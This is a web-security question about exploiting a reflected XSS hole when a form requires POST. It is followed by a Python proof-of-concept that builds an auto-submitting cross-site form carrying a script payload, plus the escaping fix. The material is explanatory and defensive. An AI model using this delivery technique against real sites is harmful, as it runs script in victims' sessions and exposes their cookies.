Consider the following URL: http://mysite.com/form?date=x. Suppose that if x is in an incorrect format, a page is returned with <p>x is not a valid date</p>, where the page author has forgotten to escape the variable x. Assume that x is properly escaped in all other locations.

It is possible to create a malicious link that could insert arbitrary JavaScript with access to the user's credentials. What if the site required a POST rather than a GET? Would there be a way to exploit this security hole?
UPDATE: Changed the situation to be more realistic and removed irrelevant references to clickjacking
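The scenario in the question, modelled end to end as an added example (this is not code from the question or from any answer in the thread, and it is not the questioner's site). It assumes a hypothetical date format of YYYY-MM-DD, a hypothetical hidden-field name `date` matching the query parameter, and a constructed payload; the target URL and the attacker host are placeholders. `render_vulnerable` reproduces the page author's mistake (x escaped on the success path, unescaped on the error path), `attacker_page` builds a third-party page that submits a POST to the target as soon as it loads, and `simulate_victim` plays the victim's browser, which fills the form from the attacker's markup and hands the field to the handler. Switching the endpoint to POST therefore does not by itself remove the reflected XSS; `render_fixed` shows the one-line fix.

```python
import html
import re
from datetime import date
from html.parser import HTMLParser

# Hypothetical target and payload; both are constructed for this example.
TARGET_URL = "http://mysite.com/form"
PAYLOAD = "<script>alert(document.cookie)</script>"

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def is_valid_date(x: str) -> bool:
    """Assumed validation rule: ISO-style YYYY-MM-DD that is a real calendar date."""
    if not DATE_RE.match(x):
        return False
    try:
        date.fromisoformat(x)
        return True
    except ValueError:
        return False


def render_vulnerable(x: str) -> str:
    """The page author's mistake: x is escaped on the success path only."""
    if is_valid_date(x):
        return f"<p>You chose {html.escape(x)}</p>"
    return f"<p>{x} is not a valid date</p>"        # unescaped: reflected XSS


def render_fixed(x: str) -> str:
    """Same handler with x escaped on every path, including the error message."""
    if is_valid_date(x):
        return f"<p>You chose {html.escape(x)}</p>"
    return f"<p>{html.escape(x)} is not a valid date</p>"


def attacker_page(action_url: str, payload: str) -> str:
    """Third-party HTML that POSTs the payload to the target when loaded.

    The value is attribute-escaped here so that the browser decodes it back to
    the raw payload before sending it in the form body.
    """
    return (
        "<html><body>"
        f'<form id="f" method="POST" action="{html.escape(action_url, quote=True)}">'
        f'<input type="hidden" name="date" value="{html.escape(payload, quote=True)}">'
        "</form>"
        "<script>document.getElementById('f').submit();</script>"
        "</body></html>"
    )


class FormFieldExtractor(HTMLParser):
    """Minimal stand-in for the browser's form handling: collects the form's
    method, action and named input values (HTMLParser unescapes attributes)."""

    def __init__(self) -> None:
        super().__init__()
        self.method = "GET"
        self.action = None
        self.fields: dict[str, str] = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.method = (a.get("method") or "GET").upper()
            self.action = a.get("action")
        elif tag == "input" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""


def simulate_victim(attacker_html: str, handler) -> str:
    """Victim's browser loads the attacker page, auto-submits the form, and
    receives the target's response rendered by `handler`."""
    p = FormFieldExtractor()
    p.feed(attacker_html)
    if p.method != "POST" or p.action != TARGET_URL:
        raise ValueError("form did not target the expected endpoint with POST")
    return handler(p.fields["date"])


if __name__ == "__main__":
    page = attacker_page(TARGET_URL, PAYLOAD)
    print(simulate_victim(page, render_vulnerable))   # script tag lands in the page verbatim
    print(simulate_victim(page, render_fixed))        # script tag is entity-encoded
```

The request method never reaches the markup: what the browser renders is whatever the handler puts in the error paragraph, so the only thing that matters is whether x is escaped there. The cross-site form submission above needs no user interaction beyond visiting the attacker's page, and the victim's browser attaches its cookies for mysite.com to that POST in the usual way.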